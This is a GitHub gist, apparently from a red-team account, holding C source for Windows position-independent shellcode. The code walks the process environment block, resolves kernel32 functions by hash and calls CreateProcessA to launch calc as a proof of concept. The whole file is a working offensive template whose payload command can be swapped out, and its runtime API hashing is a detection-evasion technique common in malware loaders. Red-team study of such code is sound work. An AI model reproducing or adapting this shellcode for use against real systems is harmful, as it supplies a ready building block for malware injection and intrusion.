Created
July 21, 2019 18:58
-
-
Save RedTeams/f145a627eafcc10a6dee36b6182dfe07 to your computer and use it in GitHub Desktop.
CreateProcessA C payload converted into a shellcode payload with the help of http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define WIN32_LEAN_AND_MEAN | |
| #pragma warning( disable : 4201 ) | |
| #include "GetProcAddressWithHash.h" | |
| #include <windows.h> | |
| #include <intrin.h> | |
| typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR); | |
| typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR); | |
| typedef BOOL(WINAPI * CREATEPROCESSA)(LPCTSTR, LPCTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION); | |
| #ifdef _WIN64 | |
| #define HOST_MACHINE IMAGE_FILE_MACHINE_AMD64 | |
| #else | |
| #define HOST_MACHINE IMAGE_FILE_MACHINE_I386 | |
| #endif | |
| #define DLL_KERNEL32_HASH 0x6A4ABC5B | |
| #define LOADLIBRARYA_HASH 0x726774c | |
| #define GETPROCADDRESS_HASH 0x7802f749 | |
| #define CREATEPROCESSA_HASH 0x863FCC79 | |
| typedef struct _UNICODE_STR | |
| { | |
| USHORT Length; | |
| USHORT MaximumLength; | |
| PWSTR pBuffer; | |
| } UNICODE_STR, *PUNICODE_STR; | |
| typedef struct _PEB_FREE_BLOCK | |
| { | |
| struct _PEB_FREE_BLOCK * pNext; | |
| DWORD dwSize; | |
| } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; | |
| typedef struct __PEB | |
| { | |
| BYTE bInheritedAddressSpace; | |
| BYTE bReadImageFileExecOptions; | |
| BYTE bBeingDebugged; | |
| BYTE bSpareBool; | |
| LPVOID lpMutant; | |
| LPVOID lpImageBaseAddress; | |
| PPEB_LDR_DATA pLdr; | |
| LPVOID lpProcessParameters; | |
| LPVOID lpSubSystemData; | |
| LPVOID lpProcessHeap; | |
| PRTL_CRITICAL_SECTION pFastPebLock; | |
| LPVOID lpFastPebLockRoutine; | |
| LPVOID lpFastPebUnlockRoutine; | |
| DWORD dwEnvironmentUpdateCount; | |
| LPVOID lpKernelCallbackTable; | |
| DWORD dwSystemReserved; | |
| DWORD dwAtlThunkSListPtr32; | |
| PPEB_FREE_BLOCK pFreeList; | |
| DWORD dwTlsExpansionCounter; | |
| LPVOID lpTlsBitmap; | |
| DWORD dwTlsBitmapBits[2]; | |
| LPVOID lpReadOnlySharedMemoryBase; | |
| LPVOID lpReadOnlySharedMemoryHeap; | |
| LPVOID lpReadOnlyStaticServerData; | |
| LPVOID lpAnsiCodePageData; | |
| LPVOID lpOemCodePageData; | |
| LPVOID lpUnicodeCaseTableData; | |
| DWORD dwNumberOfProcessors; | |
| DWORD dwNtGlobalFlag; | |
| LARGE_INTEGER liCriticalSectionTimeout; | |
| DWORD dwHeapSegmentReserve; | |
| DWORD dwHeapSegmentCommit; | |
| DWORD dwHeapDeCommitTotalFreeThreshold; | |
| DWORD dwHeapDeCommitFreeBlockThreshold; | |
| DWORD dwNumberOfHeaps; | |
| DWORD dwMaximumNumberOfHeaps; | |
| LPVOID lpProcessHeaps; | |
| LPVOID lpGdiSharedHandleTable; | |
| LPVOID lpProcessStarterHelper; | |
| DWORD dwGdiDCAttributeList; | |
| LPVOID lpLoaderLock; | |
| DWORD dwOSMajorVersion; | |
| DWORD dwOSMinorVersion; | |
| WORD wOSBuildNumber; | |
| WORD wOSCSDVersion; | |
| DWORD dwOSPlatformId; | |
| DWORD dwImageSubsystem; | |
| DWORD dwImageSubsystemMajorVersion; | |
| DWORD dwImageSubsystemMinorVersion; | |
| DWORD dwImageProcessAffinityMask; | |
| DWORD dwGdiHandleBuffer[34]; | |
| LPVOID lpPostProcessInitRoutine; | |
| LPVOID lpTlsExpansionBitmap; | |
| DWORD dwTlsExpansionBitmapBits[32]; | |
| DWORD dwSessionId; | |
| ULARGE_INTEGER liAppCompatFlags; | |
| ULARGE_INTEGER liAppCompatFlagsUser; | |
| LPVOID lppShimData; | |
| LPVOID lpAppCompatInfo; | |
| UNICODE_STR usCSDVersion; | |
| LPVOID lpActivationContextData; | |
| LPVOID lpProcessAssemblyStorageMap; | |
| LPVOID lpSystemDefaultActivationContextData; | |
| LPVOID lpSystemAssemblyStorageMap; | |
| DWORD dwMinimumStackCommit; | |
| } _PEB, *_PPEB; | |
| #pragma warning( push ) | |
| #pragma warning( disable : 4214 ) // nonstandard extension | |
| typedef struct | |
| { | |
| WORD offset : 12; | |
| WORD type : 4; | |
| } IMAGE_RELOC, *PIMAGE_RELOC; | |
| #pragma warning(pop) | |
| static inline size_t | |
| AlignValueUp(size_t value, size_t alignment) { | |
| return (value + alignment - 1) & ~(alignment - 1); | |
| } | |
| VOID ExecutePayload(VOID) | |
| { | |
| #pragma warning( push ) | |
| #pragma warning( disable : 4055 ) | |
| /* Logic for the initial entrypoint of the PIC Shellcode; Should start the new TRIGGER */ | |
| LOADLIBRARYA fLoadLibrary; | |
| GETPROCADDRESS fGetProcAddress; | |
| CREATEPROCESSA fCreateProcessA; | |
| STARTUPINFO si; | |
| PROCESS_INFORMATION pi; | |
| SecureZeroMemory(&si, sizeof(si)); | |
| SecureZeroMemory(&pi, sizeof(pi)); | |
| /* Strings must be stored in an array */ | |
| char cmd[] = { 'c', 'a', 'l', 'c', 0 }; | |
| /* resolve all functions at runtime. */ | |
| fLoadLibrary = (LOADLIBRARYA)GetProcAddressWithHash(LOADLIBRARYA_HASH); | |
| fGetProcAddress = (GETPROCADDRESS)GetProcAddressWithHash(GETPROCADDRESS_HASH); | |
| fCreateProcessA = (CREATEPROCESSA)GetProcAddressWithHash(CREATEPROCESSA_HASH); | |
| si.cb = 68; | |
| fCreateProcessA(0, (LPCTSTR)cmd, 0, 0, TRUE, 0, 0, 0, &si, &pi); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment